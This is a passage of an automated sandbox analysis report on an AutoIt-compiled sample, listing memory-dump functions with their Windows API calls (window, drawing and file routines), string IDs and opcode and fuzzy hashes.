                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LogonUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1244722697-0
                                                                                                                            • Opcode ID: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                                                                            • Instruction ID: 0ee946abdd76bea952c23f71c8427e7555c38549c773f4883e44232c2bb4d16a
                                                                                                                            • Opcode Fuzzy Hash: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                                                                            • Instruction Fuzzy Hash: 73D05E3226450EABEF018EA4DC05EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C3A12A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                                                                            • Instruction ID: f05f6767ecc3c7bb64b0a94145c461a2b99be22b8da50cb36656a227a1fbff7f
                                                                                                                            • Opcode Fuzzy Hash: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                                                                            • Instruction Fuzzy Hash: D2A0123000010CE78A001B51EC085487F5CE6001907004021F40C80031873254514580
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                                                                            • Instruction ID: f1d4363f3f41f3aeed2e298e5ed1495baf382ee6008833d6fa18800ac386c413
                                                                                                                            • Opcode Fuzzy Hash: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                                                                            • Instruction Fuzzy Hash: 8F222330A05626CBDF38CA25E5D477CB7A1FF01304F38806AD9668B9A2DF709ED9D641
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction ID: 0dc996623b212e0164e90183e55611423316ffced93e4bac2d795901b1b7a896
                                                                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction Fuzzy Hash: 7DC174322251930ADF6E463AC47403EFAA15EA37B171E176DD8B3CB1D4EE20DB65D620
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction ID: 2299369028f5d2c479d14c9a9ac98f9f86b5f783d3d18fb61d799ea941b5c32a
                                                                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction Fuzzy Hash: 3CC161332151930EDF2E463AC43413EBAA15EA37B1B1E176DD8B2DB1D5EE20CA25D660
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction ID: 1f07ec0b8070b58addcdf0f1ae933ed900708375d03a185f7bb13063269968c0
                                                                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction Fuzzy Hash: 83C163722251930EDF2E463A847413EFAA15EA37B171E176DD8B2CB1D4EE20CA659620
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                            • Instruction ID: 779cbf677384b15486d497b8aead863588e440a5e8bec875fe1bedd73a5fe1d7
                                                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                            • Instruction Fuzzy Hash: 8541D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                            • Instruction ID: 6622484ce378f6f78a7f81e4df115ff4b7084a5178cfd3430bfdedbf2528635c
                                                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                            • Instruction Fuzzy Hash: DC019278A00119EFCB44DF98C5909AEF7F5FB48310F20859AD949A7705E730AE51DB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                            • Instruction ID: b69985ab377aac4ce0929e4184090630050b971853f6b4db64df7a7dfe42edbf
                                                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                            • Instruction Fuzzy Hash: 43019278A01119EFCB44DF98C5909AEF7F5FB48310F2085DAD949A7701E730AE41DB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C8785B
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C8786D
                                                                                                                            • DestroyWindow.USER32 ref: 00C8787B
                                                                                                                            • GetDesktopWindow.USER32 ref: 00C87895
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C8789C
                                                                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C879DD
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C879ED
                                                                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A35
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C87A41
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C87A7B
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A9D
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AB0
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87ABB
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C87AC4
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AD3
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C87ADC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AE3
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C87AEE
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B00
                                                                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CA2CAC,00000000), ref: 00C87B16
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C87B26
                                                                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C87B4C
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C87B6B
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B8D
                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87D7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                            • Opcode ID: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                                                                            • Instruction ID: 29eed8d8ae1f0429484585596256f9ed5eb78c43b1ae1c58dd7e943b7aa517fb
                                                                                                                            • Opcode Fuzzy Hash: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                                                                            • Instruction Fuzzy Hash: C3026A71900115AFDB14EFA4CC89FAE7BB9EB49314F148259F915EB2A0D730EE42DB60
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?,00C9F910), ref: 00C93627
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C9364B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                            • API String ID: 4105515805-45149045
                                                                                                                            • Opcode ID: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                                                                            • Instruction ID: fec9d16f670e06af51590235920bcd75cdf2308544e6cc9e395731e901eb2764
                                                                                                                            • Opcode Fuzzy Hash: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                                                                            • Instruction Fuzzy Hash: D5D18C712183419BCF14EF10C869AAE77A5EF95344F144468F8929B3E2CB31EE4AEB45
                                                                                                                            APIs
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00C9A630
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C9A661
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C9A66D
                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00C9A687
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00C9A696
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A6C1
                                                                                                                            • GetSysColor.USER32(00000010), ref: 00C9A6C9
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00C9A6D0
                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00C9A6DF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C9A6E6
                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00C9A731
                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 00C9A763
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C9A78E
                                                                                                                              • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000012), ref: 00C9A903
                                                                                                                              • Part of subcall function 00C9A8CA: SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                                                                              • Part of subcall function 00C9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                                                                              • Part of subcall function 00C9A8CA: GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                                                                              • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000011), ref: 00C9A945
                                                                                                                              • Part of subcall function 00C9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                                                                              • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                                                                              • Part of subcall function 00C9A8CA: SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                                                                              • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                                                                              • Part of subcall function 00C9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                                                                              • Part of subcall function 00C9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                                                                              • Part of subcall function 00C9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                                                                              • Part of subcall function 00C9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3521893082-0
                                                                                                                            • Opcode ID: b94fcf919aa25b0150c1677bbc82dd997e41928e7af02293829a3ecceb9e9733
                                                                                                                            • Instruction ID: e7a6a56fbd6e9b9ab603534cce6a37f8cf6683c7f80edbaec43fc8a16a5d80b2
                                                                                                                            • Opcode Fuzzy Hash: b94fcf919aa25b0150c1677bbc82dd997e41928e7af02293829a3ecceb9e9733
                                                                                                                            • Instruction Fuzzy Hash: 12914B72408305EFCB109F64DC0CB6E7BA9FB88321F104A2EF9A2D61A0D771D945CB92
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?), ref: 00C12CA2
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C12CE8
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C12CF3
                                                                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00C12CFE
                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00C12D09
                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C4C43B
                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C4C474
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C4C89D
                                                                                                                              • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00C4C8DA
                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C4C8F1
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C907
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C912
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 464785882-4108050209
                                                                                                                            • Opcode ID: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                                                                            • Instruction ID: ba56c072d9f1c5abae851a6a5c22c52b16ef7a5ec6104ebceb9d4a2187650f6d
                                                                                                                            • Opcode Fuzzy Hash: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                                                                            • Instruction Fuzzy Hash: 9E129D34601201EFDB50CF24C8D8BA9BBE5BF05310F548569F9A5CB262CB31ED92EB91
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C874DE
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C8759D
                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C875DB
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C875ED
                                                                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C87633
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C8763F
                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C87683
                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C87692
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C876A2
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C876A6
                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C876B6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C876BF
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C876C8
                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C876F4
                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C8770B
                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C87746
                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C8775A
                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C8776B
                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C8779B
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C877A6
                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C877B1
